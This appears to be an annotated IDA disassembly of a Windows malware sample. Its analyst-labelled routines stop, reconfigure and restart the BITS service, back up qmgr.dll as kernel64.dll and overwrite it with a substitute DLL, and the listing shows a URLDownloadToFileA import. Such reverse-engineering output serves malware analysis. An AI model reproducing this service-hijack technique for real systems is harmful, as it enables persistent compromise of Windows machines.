.text:004015A0 .text:004015A0 ; int __cdecl ManipulateBITSService(LPCSTR lpServiceName, DWORD dwStartType) .text:004015A0 ManipulateBITSService proc near ; CODE XREF: WinMain(x,x,x,x)+2E5p .text:004015A0 ; WinMain(x,x,x,x)+3A2p .text:004015A0 .text:004015A0 lpServiceName = dword ptr 4 .text:004015A0 dwStartType = dword ptr 8 .text:004015A0 .text:004015A0 53 push ebx .text:004015A1 55 push ebp .text:004015A2 56 push esi .text:004015A3 57 push edi .text:004015A4 68 3F 00 0F 00 push 0F003Fh ; dwDesiredAccess .text:004015A9 6A 00 push 0 ; lpDatabaseName .text:004015AB 6A 00 push 0 ; lpMachineName .text:004015AD FF 15 08 20 40 00 call ds:OpenSCManagerA .text:004015B3 8B F0 mov esi, eax .text:004015B5 85 F6 test esi, esi .text:004015B7 75 05 jnz short loc_4015BE .text:004015B9 5F pop edi .text:004015BA 5E pop esi .text:004015BB 5D pop ebp .text:004015BC 5B pop ebx .text:004015BD C3 retn .text:004015BE ; --------------------------------------------------------------------------- .text:004015BE .text:004015BE loc_4015BE: ; CODE XREF: ManipulateBITSService+17j .text:004015BE 8B 44 24 14 mov eax, [esp+10h+lpServiceName] .text:004015C2 68 FF 01 0F 00 push 0F01FFh ; dwDesiredAccess .text:004015C7 50 push eax ; lpServiceName .text:004015C8 56 push esi ; hSCManager .text:004015C9 FF 15 0C 20 40 00 call ds:OpenServiceA .text:004015CF 8B D8 mov ebx, eax .text:004015D1 85 DB test ebx, ebx .text:004015D3 75 05 jnz short loc_4015DA .text:004015D5 5F pop edi .text:004015D6 5E pop esi .text:004015D7 5D pop ebp .text:004015D8 5B pop ebx .text:004015D9 C3 retn .text:004015DA ; --------------------------------------------------------------------------- .text:004015DA .text:004015DA loc_4015DA: ; CODE XREF: ManipulateBITSService+33j .text:004015DA 56 push esi ; hSCManager .text:004015DB FF 15 10 20 40 00 call ds:LockServiceDatabase .text:004015E1 8B 4C 24 18 mov ecx, [esp+10h+dwStartType] .text:004015E5 6A 00 push 0 ; lpDisplayName .text:004015E7 6A 00 push 0 ; lpPassword .text:004015E9 6A 00 push 0 ; lpServiceStartName .text:004015EB 6A 00 push 0 ; lpDependencies .text:004015ED 6A 00 push 0 ; lpdwTagId .text:004015EF 6A 00 push 0 ; lpLoadOrderGroup .text:004015F1 6A 00 push 0 ; lpBinaryPathName .text:004015F3 6A FF push 0FFFFFFFFh ; dwErrorControl .text:004015F5 51 push ecx ; dwStartType .text:004015F6 6A FF push 0FFFFFFFFh ; dwServiceType .text:004015F8 53 push ebx ; hService .text:004015F9 8B E8 mov ebp, eax .text:004015FB FF 15 14 20 40 00 call ds:ChangeServiceConfigA .text:00401601 8B F8 mov edi, eax .text:00401603 85 FF test edi, edi .text:00401605 75 05 jnz short loc_40160C .text:00401607 5F pop edi .text:00401608 5E pop esi .text:00401609 5D pop ebp .text:0040160A 5B pop ebx .text:0040160B C3 retn .text:0040160C ; --------------------------------------------------------------------------- .text:0040160C .text:0040160C loc_40160C: ; CODE XREF: ManipulateBITSService+65j .text:0040160C 55 push ebp ; ScLock .text:0040160D FF 15 18 20 40 00 call ds:UnlockServiceDatabase .text:00401613 56 push esi ; hSCObject .text:00401614 8B 35 1C 20 40 00 mov esi, ds:CloseServiceHandle .text:0040161A FF D6 call esi ; CloseServiceHandle .text:0040161C 53 push ebx ; hSCObject .text:0040161D FF D6 call esi ; CloseServiceHandle .text:0040161F 8B C7 mov eax, edi .text:00401621 5F pop edi .text:00401622 5E pop esi .text:00401623 5D pop ebp .text:00401624 5B pop ebx .text:00401625 C3 retn .text:00401625 ManipulateBITSService endp .text:00401625 .text:00401625 ; --------------------------------------------------------------------------- .text:00401626 90 90 90 90 90 90 90 90+ align 10h .text:00401630 .text:00401630 ; =============== S U B R O U T I N E ======================================= .text:00401630 .text:00401630 .text:00401630 ; int __cdecl StopBITS(LPCSTR lpServiceName) .text:00401630 StopBITS proc near ; CODE XREF: WinMain(x,x,x,x)+2FDp .text:00401630 .text:00401630 ServiceStatus = _SERVICE_STATUS ptr -1Ch .text:00401630 lpServiceName = dword ptr 4 .text:00401630 .text:00401630 83 EC 1C sub esp, 1Ch .text:00401633 53 push ebx .text:00401634 56 push esi .text:00401635 57 push edi .text:00401636 33 DB xor ebx, ebx .text:00401638 68 3F 00 0F 00 push 0F003Fh ; dwDesiredAccess .text:0040163D 53 push ebx ; lpDatabaseName .text:0040163E 53 push ebx ; lpMachineName .text:0040163F FF 15 08 20 40 00 call ds:OpenSCManagerA .text:00401645 8B F8 mov edi, eax .text:00401647 85 FF test edi, edi .text:00401649 75 0A jnz short loc_401655 .text:0040164B 5F pop edi .text:0040164C 5E pop esi .text:0040164D 83 C8 FF or eax, 0FFFFFFFFh .text:00401650 5B pop ebx .text:00401651 83 C4 1C add esp, 1Ch .text:00401654 C3 retn .text:00401655 ; --------------------------------------------------------------------------- .text:00401655 .text:00401655 loc_401655: ; CODE XREF: StopBITS+19j .text:00401655 8B 44 24 2C mov eax, [esp+28h+lpServiceName] .text:00401659 68 FF 01 0F 00 push 0F01FFh ; dwDesiredAccess .text:0040165E 50 push eax ; lpServiceName .text:0040165F 57 push edi ; hSCManager .text:00401660 FF 15 0C 20 40 00 call ds:OpenServiceA .text:00401666 8B F0 mov esi, eax .text:00401668 85 F6 test esi, esi .text:0040166A 74 12 jz short loc_40167E .text:0040166C 8D 4C 24 0C lea ecx, [esp+28h+ServiceStatus] .text:00401670 51 push ecx ; lpServiceStatus .text:00401671 6A 01 push 1 ; dwControl .text:00401673 56 push esi ; hService .text:00401674 FF 15 04 20 40 00 call ds:ControlService .text:0040167A 85 C0 test eax, eax .text:0040167C 75 03 jnz short loc_401681 .text:0040167E .text:0040167E loc_40167E: ; CODE XREF: StopBITS+3Aj .text:0040167E 83 CB FF or ebx, 0FFFFFFFFh .text:00401681 .text:00401681 loc_401681: ; CODE XREF: StopBITS+4Cj .text:00401681 57 push edi ; hSCObject .text:00401682 8B 3D 1C 20 40 00 mov edi, ds:CloseServiceHandle .text:00401688 FF D7 call edi ; CloseServiceHandle .text:0040168A 85 F6 test esi, esi .text:0040168C 74 03 jz short loc_401691 .text:0040168E 56 push esi ; hSCObject .text:0040168F FF D7 call edi ; CloseServiceHandle .text:00401691 .text:00401691 loc_401691: ; CODE XREF: StopBITS+5Cj .text:00401691 5F pop edi .text:00401692 8B C3 mov eax, ebx .text:00401694 5E pop esi .text:00401695 5B pop ebx .text:00401696 83 C4 1C add esp, 1Ch .text:00401699 C3 retn .text:00401699 StopBITS endp .text:00401699 .text:00401699 ; --------------------------------------------------------------------------- .text:0040169A 90 90 90 90 90 90 align 10h .text:004016A0 .text:004016A0 ; =============== S U B R O U T I N E ======================================= .text:004016A0 .text:004016A0 .text:004016A0 ; int __cdecl StartBITS(LPCSTR lpServiceName) .text:004016A0 StartBITS proc near ; CODE XREF: WinMain(x,x,x,x)+3B8p .text:004016A0 .text:004016A0 lpServiceName = dword ptr 4 .text:004016A0 .text:004016A0 53 push ebx .text:004016A1 56 push esi .text:004016A2 57 push edi .text:004016A3 33 DB xor ebx, ebx .text:004016A5 68 3F 00 0F 00 push 0F003Fh ; dwDesiredAccess .text:004016AA 53 push ebx ; lpDatabaseName .text:004016AB 53 push ebx ; lpMachineName .text:004016AC FF 15 08 20 40 00 call ds:OpenSCManagerA .text:004016B2 8B F8 mov edi, eax .text:004016B4 85 FF test edi, edi .text:004016B6 75 07 jnz short loc_4016BF .text:004016B8 5F pop edi .text:004016B9 5E pop esi .text:004016BA 83 C8 FF or eax, 0FFFFFFFFh .text:004016BD 5B pop ebx .text:004016BE C3 retn .text:004016BF ; --------------------------------------------------------------------------- .text:004016BF .text:004016BF loc_4016BF: ; CODE XREF: StartBITS+16j .text:004016BF 8B 44 24 10 mov eax, [esp+0Ch+lpServiceName] .text:004016C3 68 FF 01 0F 00 push 0F01FFh ; dwDesiredAccess .text:004016C8 50 push eax ; lpServiceName .text:004016C9 57 push edi ; hSCManager .text:004016CA FF 15 0C 20 40 00 call ds:OpenServiceA .text:004016D0 8B F0 mov esi, eax .text:004016D2 85 F6 test esi, esi .text:004016D4 74 0F jz short loc_4016E5 .text:004016D6 6A 00 push 0 ; lpServiceArgVectors .text:004016D8 6A 00 push 0 ; dwNumServiceArgs .text:004016DA 56 push esi ; hService .text:004016DB FF 15 00 20 40 00 call ds:StartServiceA .text:004016E1 85 C0 test eax, eax .text:004016E3 75 03 jnz short loc_4016E8 .text:004016E5 .text:004016E5 loc_4016E5: ; CODE XREF: StartBITS+34j .text:004016E5 83 CB FF or ebx, 0FFFFFFFFh .text:004016E8 .text:004016E8 loc_4016E8: ; CODE XREF: StartBITS+43j .text:004016E8 57 push edi ; hSCObject .text:004016E9 8B 3D 1C 20 40 00 mov edi, ds:CloseServiceHandle .text:004016EF FF D7 call edi ; CloseServiceHandle .text:004016F1 85 F6 test esi, esi .text:004016F3 74 03 jz short loc_4016F8 .text:004016F5 56 push esi ; hSCObject .text:004016F6 FF D7 call edi ; CloseServiceHandle .text:004016F8 .text:004016F8 loc_4016F8: ; CODE XREF: StartBITS+53j .text:004016F8 5F pop edi .text:004016F9 8B C3 mov eax, ebx .text:004016FB 5E pop esi .text:004016FC 5B pop ebx .text:004016FD C3 retn .text:004016FD StartBITS endp .text:004016FD .text:004016FD ; --------------------------------------------------------------------------- .text:004016FE 90 90 align 10h .text:00401700 .text:00401700 ; =============== S U B R O U T I N E ======================================= .text:00401700 .text:00401700 .text:00401700 ; int __cdecl ReplaceOriginalQMGR_DLLwithEventSystem_DLL(LPCSTR lpNewFileName, int, int, LPCSTR lpExistingFileName, LPCSTR lpFileName) .text:00401700 ReplaceOriginalQMGR_DLLwithEventSystem_DLL proc near .text:00401700 ; CODE XREF: WinMain(x,x,x,x)+34Bp .text:00401700 .text:00401700 FindFileData = _WIN32_FIND_DATAA ptr -140h .text:00401700 lpNewFileName = dword ptr 4 .text:00401700 arg_4 = dword ptr 8 .text:00401700 arg_8 = dword ptr 0Ch .text:00401700 lpExistingFileName= dword ptr 10h .text:00401700 lpFileName = dword ptr 14h .text:00401700 .text:00401700 8B 44 24 04 mov eax, [esp+lpNewFileName] .text:00401704 81 EC 40 01 00 00 sub esp, 140h .text:0040170A 53 push ebx .text:0040170B 56 push esi .text:0040170C 8B B4 24 58 01 00 00 mov esi, [esp+148h+lpExistingFileName] .text:00401713 57 push edi .text:00401714 8B 3D 44 20 40 00 mov edi, ds:CopyFileA .text:0040171A 6A 00 push 0 ; bFailIfExists .text:0040171C 50 push eax ; lpNewFileName .text:0040171D 56 push esi ; lpExistingFileName .text:0040171E FF D7 call edi ; CopyFileA .text:00401720 85 C0 test eax, eax .text:00401722 75 0D jnz short CopyFileWorked .text:00401724 5F pop edi .text:00401725 5E pop esi .text:00401726 83 C8 FF or eax, 0FFFFFFFFh .text:00401729 5B pop ebx .text:0040172A 81 C4 40 01 00 00 add esp, 140h .text:00401730 C3 retn .text:00401731 ; --------------------------------------------------------------------------- .text:00401731 .text:00401731 CopyFileWorked: ; CODE XREF: ReplaceOriginalQMGR_DLLwithEventSystem_DLL+22j .text:00401731 8B 8C 24 54 01 00 00 mov ecx, [esp+14Ch+arg_4] .text:00401738 8B 9C 24 58 01 00 00 mov ebx, [esp+14Ch+arg_8] .text:0040173F 6A 01 push 1 ; dwFlags .text:00401741 51 push ecx ; lpNewFileName .text:00401742 53 push ebx ; lpExistingFileName .text:00401743 FF 15 40 20 40 00 call ds:MoveFileExA ; backup original qmgr.dll as kernel64.dll .text:00401749 85 C0 test eax, eax .text:0040174B 75 0D jnz short loc_40175A .text:0040174D 5F pop edi .text:0040174E 5E pop esi .text:0040174F 83 C8 FF or eax, 0FFFFFFFFh .text:00401752 5B pop ebx .text:00401753 81 C4 40 01 00 00 add esp, 140h .text:00401759 C3 retn .text:0040175A ; --------------------------------------------------------------------------- .text:0040175A .text:0040175A loc_40175A: ; CODE XREF: ReplaceOriginalQMGR_DLLwithEventSystem_DLL+4Bj .text:0040175A 6A 00 push 0 ; bFailIfExists .text:0040175C 53 push ebx ; lpNewFileName .text:0040175D 56 push esi ; lpExistingFileName .text:0040175E FF D7 call edi ; CopyFileA .text:00401760 85 C0 test eax, eax .text:00401762 75 0D jnz short loc_401771 .text:00401764 5F pop edi .text:00401765 5E pop esi .text:00401766 83 C8 FF or eax, 0FFFFFFFFh .text:00401769 5B pop ebx .text:0040176A 81 C4 40 01 00 00 add esp, 140h .text:00401770 C3 retn .text:00401771 ; --------------------------------------------------------------------------- .text:00401771 .text:00401771 loc_401771: ; CODE XREF: ReplaceOriginalQMGR_DLLwithEventSystem_DLL+62j .text:00401771 8B 9C 24 60 01 00 00 mov ebx, [esp+14Ch+lpFileName] .text:00401778 8D 54 24 0C lea edx, [esp+14Ch+FindFileData] .text:0040177C 52 push edx ; lpFindFileData .text:0040177D 53 push ebx ; lpFileName .text:0040177E FF 15 54 20 40 00 call ds:FindFirstFileA .text:00401784 83 F8 FF cmp eax, 0FFFFFFFFh .text:00401787 74 17 jz short loc_4017A0 .text:00401789 6A 00 push 0 ; bFailIfExists .text:0040178B 53 push ebx ; lpNewFileName .text:0040178C 56 push esi ; lpExistingFileName .text:0040178D FF D7 call edi ; CopyFileA .text:0040178F 85 C0 test eax, eax .text:00401791 75 0D jnz short loc_4017A0 .text:00401793 5F pop edi .text:00401794 5E pop esi .text:00401795 83 C8 FF or eax, 0FFFFFFFFh .text:00401798 5B pop ebx .text:00401799 81 C4 40 01 00 00 add esp, 140h .text:0040179F C3 retn .text:004017A0 ; --------------------------------------------------------------------------- .text:004017A0 .text:004017A0 loc_4017A0: ; CODE XREF: ReplaceOriginalQMGR_DLLwithEventSystem_DLL+87j .text:004017A0 ; ReplaceOriginalQMGR_DLLwithEventSystem_DLL+91j .text:004017A0 5F pop edi .text:004017A1 5E pop esi .text:004017A2 33 C0 xor eax, eax .text:004017A4 5B pop ebx .text:004017A5 81 C4 40 01 00 00 add esp, 140h .text:004017AB C3 retn .text:004017AB ReplaceOriginalQMGR_DLLwithEventSystem_DLL endp .text:004017AB .text:004017AB ; --------------------------------------------------------------------------- .text:004017AC 90 90 90 90 align 10h .text:004017B0 ; [00000006 BYTES: COLLAPSED FUNCTION sprintf. PRESS KEYPAD "+" TO EXPAND] .text:004017B6 ; [0000013E BYTES: COLLAPSED FUNCTION start. PRESS KEYPAD "+" TO EXPAND] .text:004018F4 ; --------------------------------------------------------------------------- .text:004018F4 8B 45 EC mov eax, [ebp-14h] .text:004018F7 8B 08 mov ecx, [eax] .text:004018F9 8B 09 mov ecx, [ecx] .text:004018FB 89 4D 88 mov [ebp-78h], ecx .text:004018FE 50 push eax .text:004018FF 51 push ecx .text:00401900 E8 0F 00 00 00 call _XcptFilter .text:00401905 59 pop ecx .text:00401906 59 pop ecx .text:00401907 C3 retn .text:00401908 ; --------------------------------------------------------------------------- .text:00401908 8B 65 E8 mov esp, [ebp-18h] .text:0040190B FF 75 88 push dword ptr [ebp-78h] .text:0040190E FF 15 90 20 40 00 call ds:_exit .text:00401914 ; [00000006 BYTES: COLLAPSED FUNCTION _XcptFilter. PRESS KEYPAD "+" TO EXPAND] .text:0040191A ; [00000006 BYTES: COLLAPSED FUNCTION _initterm. PRESS KEYPAD "+" TO EXPAND] .text:00401920 ; [00000012 BYTES: COLLAPSED FUNCTION __setdefaultprecision. PRESS KEYPAD "+" TO EXPAND] .text:00401932 .text:00401932 ; =============== S U B R O U T I N E ======================================= .text:00401932 .text:00401932 .text:00401932 sub_401932 proc near ; DATA XREF: start+77o .text:00401932 33 C0 xor eax, eax .text:00401934 C3 retn .text:00401934 sub_401932 endp .text:00401934 .text:00401935 ; [00000001 BYTES: COLLAPSED FUNCTION nullsub_1. PRESS KEYPAD "+" TO EXPAND] .text:00401936 CC CC CC CC CC CC CC CC+ align 10h .text:00401940 .text:00401940 loc_401940: ; DATA XREF: start+Ao .text:00401940 FF 25 BC 20 40 00 jmp ds:_except_handler3 .text:00401946 ; [00000006 BYTES: COLLAPSED FUNCTION _controlfp. PRESS KEYPAD "+" TO EXPAND] .text:0040194C ; [00000006 BYTES: COLLAPSED FUNCTION URLDownloadToFileA. PRESS KEYPAD "+" TO EXPAND] .text:00401952 00 00 align 4 .text:00401954 00 00 00 00 00 00 00 00+ dd 2Bh dup(0) .text:00401A00 ?? ?? ?? ?? ?? ?? ?? ??+ dd 180h dup(?) .text:00401A00 ?? ?? ?? ?? ?? ?? ?? ??+_text ends .text:00401A00 ?? ?? ?? ?? ?? ?? ?? ??+